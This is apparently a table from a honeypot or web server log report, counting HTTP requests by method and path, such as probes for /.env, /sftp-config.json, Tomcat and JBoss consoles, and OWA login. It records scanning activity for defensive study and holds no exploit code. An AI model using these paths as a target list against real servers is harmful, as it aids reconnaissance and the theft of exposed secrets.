| 4 | GET | /cgi-bin/luci/;stok=/locale |
HTTP/1.1 |
| 2 | GET | /command_port.ini |
HTTP/1.1 |
| 1 | GET | /druid/index.html |
HTTP/1.1 |
| 4 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /geoserver/web/ |
HTTP/1.1 |
| 9 | GET | /login.rsp |
HTTP/1.1 |
| 2 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /sftp-config.json |
HTTP/1.1 |
| 1 | GET | /vicidial/welcome.php |
HTTP/1.0 |
| 1 | GET | /webui/ |
HTTP/1.1 |
| 1 | HEAD | /.env |
HTTP/1.1 |
| 1 | HEAD | /invoker/EJBInvokerServlet |
HTTP/1.1 |
| 1 | HEAD | /invoker/JMXInvokerServlet |
HTTP/1.1 |
| 1 | HEAD | /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss[.]system:type=ServerInfo |
HTTP/1.1 |
| 1 | HEAD | /web-console/ServerInfo.jsp |
HTTP/1.1 |
| 2 | POST | /owa/auth.owa |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |